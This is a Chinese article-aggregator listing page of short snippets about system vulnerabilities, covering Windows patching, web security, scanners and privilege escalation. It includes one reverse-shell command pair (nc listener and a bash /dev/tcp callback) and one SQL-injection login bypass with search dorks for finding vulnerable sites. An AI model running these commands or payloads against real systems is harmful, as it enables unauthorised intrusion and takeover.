Win7系统中存在漏洞时,用户需要采用各种办法来修复系统中存在的漏洞,既可以使用Windows Update修复,也可使用360安全卫士来修复。 一、使用Windows Update修复系统漏洞 Windows Update时Microsoft公司提供的一款自动更新工具,该工具提供了漏洞补丁的安装、 ...
Windows系统是迄今为止使用频率最高的操作系统,虽然其安全性随着版本的更新不断提高,但由于人为编写的缘故始终存在漏洞和缺陷。但Mircosoft公司通过发布漏洞补丁来提高系统的安全性,使Windows系统不再被攻破。因此,用户不仅需了解Windows操作系统的漏洞和缺陷,还需了解如何弥补这些漏洞 ...
Windows 操作系统同样也是一种软件——针对硬件应用的软件。既然是软件,那么它就有Bug,即平常所说的系统漏洞。 更新与维护Windows 8工作站 对于局域网中的Windows 8用户而言,Windows 系统会自动通过Windows Updata来更新补丁,但速度比较慢。但有一点要注意,必须 ...
分类:
其他好文 时间:
2016-11-01 14:50:50
阅读次数:
271
项目背景: SpringMVC + Mybatis + MySql数据库(javaWeb项目开发) 相关模块:登录,个人详细信息修改,订单详情查询 相关漏洞介绍: 1.登录的验证码:登录的验证码一定要在后台做验证,如果只是前台验证验证码后,后台未验证,可能会发生第一次验证验证码后,通过工具绕过验证码 ...
分类:
编程语言 时间:
2016-10-13 14:11:37
阅读次数:
121
安犬漏洞扫描云平台是一个基于Saas服务模式的漏洞扫描云平台,扫描引擎包括Qualys、Nessus、Acunetix世界三大漏洞扫描引擎。用户无需安装任何硬件设备,无需下载任何软件,只需在云平台提交扫描IP或者扫描网址即可扫描系统漏洞。产品优势:1.基于云端:扫描引擎基于云端平台,..
分类:
其他好文 时间:
2016-09-21 16:10:51
阅读次数:
293
Linux下的漏洞提权 linux下一般都是系统漏洞提权,分为以下几个步骤: 提权 反弹shell 本地:nc -l -p 8000 目标机器:/bin/bash -i >& /dev/tcp/10.10.10.10/8000 0>&1 实例 1、得到系统版本号 centos 7 local roo ...
分类:
系统相关 时间:
2016-09-02 18:58:05
阅读次数:
369
当我们拿到webshell之后,下一步该干什么了?权限提升 水平权限提升(通过控制一个账户来搞定其他的账户) 垂直权限提升(从单一用户权限提升至完全管理权限) 主机权限提升(重点介绍) 一、主机权限提升 1.分类 Linux提权 Windows提权 2.Windows提权(前提是:有操作系统漏洞,其 ...
分类:
其他好文 时间:
2016-08-26 22:49:57
阅读次数:
220
1 常用操作系统扫描工具介绍 1.1 CIS-CAT 【功能】 可以根据不同的操作系统,选择不同的基准进行系统漏洞扫描。 【适用对象】 Unix/Linux,MS Windows,并且这些系统上装了java 5或以上。 本文主要介绍在Linux下的用法 1.1.1 扫描准备 将工具解压到目标Linu ...
分类:
其他好文 时间:
2016-06-08 12:21:20
阅读次数:
255
本博文讲述如何在linux系统下静默安装oracle11g(11.2.4.0)。主要用于图形显示不方便的场景,也适用于脚本化批量部署的需要。系统环境OS:OracleLinuxServerrelease6.7软件包采用mini安装,降低系统负载,减少系统漏洞攻击面。并安装oracle工具包,简化oracle数据库安装流程。..
分类:
数据库 时间:
2016-05-30 20:07:38
阅读次数:
230
仅供拿shell,提权测试用,请勿恶意破坏 XuSoft系统: 后台万能密码:'or'='or' 可直接登陆,后台地址 /manage/login.asp inurl:ReadArticlemb.asp?id= inurl:ReadBigClassmb.asp?id= inurl:ReadBigCl ...
分类:
Web程序 时间:
2016-04-30 06:37:14
阅读次数:
1561
